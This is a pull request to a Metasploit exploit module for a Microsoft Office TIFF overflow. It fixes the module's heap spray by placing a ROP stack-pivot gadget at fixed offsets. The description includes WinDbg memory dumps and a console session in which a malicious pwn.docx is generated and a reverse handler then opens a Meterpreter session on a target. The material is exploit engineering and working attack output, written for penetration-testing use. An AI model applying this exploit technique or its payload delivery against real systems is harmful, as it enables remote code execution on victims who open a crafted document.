### PR TITLE
Fix heap spray

### DIFF
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -156,7 +156,9 @@ class Metasploit3 < Msf::Exploit::Remote
     p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
     p << payload.encoded
     block  = p
-    block << rand_text_alpha(1024 - p.length)
+    block << rand_text_alpha(1024 - 80 - p.length)
+    block << [ 0x77c34fbf, 0x200f0704 ].pack("V") # pop esp # ret # from msvcrt
+    block << rand_text_alpha(1024 - block.length)
 
     buf = ''
     while (buf.length < 0x80000)


### PR DESCRIPTION
While testing, noticed the original exploit was failing because of the following:

Here is a list of patterns, into an allocation , for the stack pivot:

```
0:000> s -d 200e0020 L806e0 77c15ed5 77c3b860 
200e0700  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e0b00  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e0f00  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e1300  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e1700  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e1b00  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e1f00  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e2300  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e2700  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e2b00  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e2f00  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e3300  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e3700  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e3b00  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
200e3f00  77c15ed5 77c3b860 ffffffff 77c1be18  .^.w`..w.......w
blah blah blah, a lot of them....
```

It means which landing into any of them should be good enough. But it's not working. Here is my explanation. The contents of the memory for the first coincidence of the stack pivot - 0x50 bytes:

```
0:000> dd 200e0700  - 50
200e06b0  77c34fbf 200f0704 ffffffff ffffffff
200e06c0  ffffffff ffffffff ffffffff ffffffff
200e06d0  ffffffff ffffffff ffffffff ffffffff
200e06e0  ffffffff ffffffff ffffffff ffffffff
200e06f0  ffffffff ffffffff ffffffff ffffffff
200e0700  77c15ed5 77c3b860 ffffffff 77c1be18
200e0710  47d1e6e3 77c2362c 77c5d9bb 77c2e071
200e0720  77c50d13 ffffffc0 77c58fbc 77c1be18
```

There are the gadgets which allows to align the stack (pop esp #ret). But now, if we get any other of the allocations:

```
0:000> dd 20274b00  - 50
20274ab0  42424242 42424242 42424242 42424242
20274ac0  42424242 42424242 42424242 42424242
20274ad0  42424242 42424242 42424242 42424242
20274ae0  42424242 42424242 42424242 42424242
20274af0  42424242 42424242 42424242 42424242
20274b00  77c15ed5 77c3b860 ffffffff 77c1be18
20274b10  47d1e6e3 77c2362c 77c5d9bb 77c2e071
20274b20  77c50d13 ffffffc0 77c58fbc 77c1be18
```

0x50 bytes before there isn't the stack alignment, but just random data.

This pull request tries to fix it. By fixing the blocks into an allocation the exploit go very reliable (still through File-open):

```
set msf exploit(mswin_tiff_overflow) > set FILENAME pwn.docx
FILENAME => pwn.docx
msf exploit(mswin_tiff_overflow) > rexploit
[*] Reloading module...

[*] Initializing files...
[*] Packing directory: _rels
[*] Packing directory: docProps
[*] Packing file: docProps/app.xml
[*] Packing file: docProps/core.xml
[*] Packing directory: word
[*] Packing directory: word/charts
[*] Packing directory: word/charts/_rels
[*] Packing file: word/charts/_rels/chart1.xml.rels
[*] Packing file: word/charts/_rels/chart2.xml.rels
[*] Packing file: word/charts/_rels/chart3.xml.rels
[*] Packing file: word/charts/_rels/chart4.xml.rels
[*] Packing file: word/charts/_rels/chart5.xml.rels
[*] Packing file: word/charts/_rels/chart6.xml.rels
[*] Packing file: word/charts/chart1.xml
[*] Packing file: word/charts/chart2.xml
[*] Packing file: word/charts/chart3.xml
[*] Packing file: word/charts/chart4.xml
[*] Packing file: word/charts/chart5.xml
[*] Packing file: word/charts/chart6.xml
[*] Packing directory: word/embeddings
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx
[*] Packing file: word/fontTable.xml
[*] Packing directory: word/media
[*] Packing file: word/settings.xml
[*] Packing file: word/styles.xml
[*] Packing directory: word/theme
[*] Packing file: word/theme/theme1.xml
[*] Packing file: word/webSettings.xml
[*] Packing ActiveX controls...
[*] Packing file: [Content_Types].xml
[*] Packing file: /word/media/image1.jpeg
[*] Packing file: /word/document.xml
[*] Packing file: _rels/.rels
[*] Packing file: /word/_rels/document.xml.rels
[+] pwn.docx stored at /Users/juan/.msf4/local/pwn.docx
msf exploit(mswin_tiff_overflow) > use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.244:1105) at 2013-11-25 20:05:38 -0600

meterpreter > exit
```
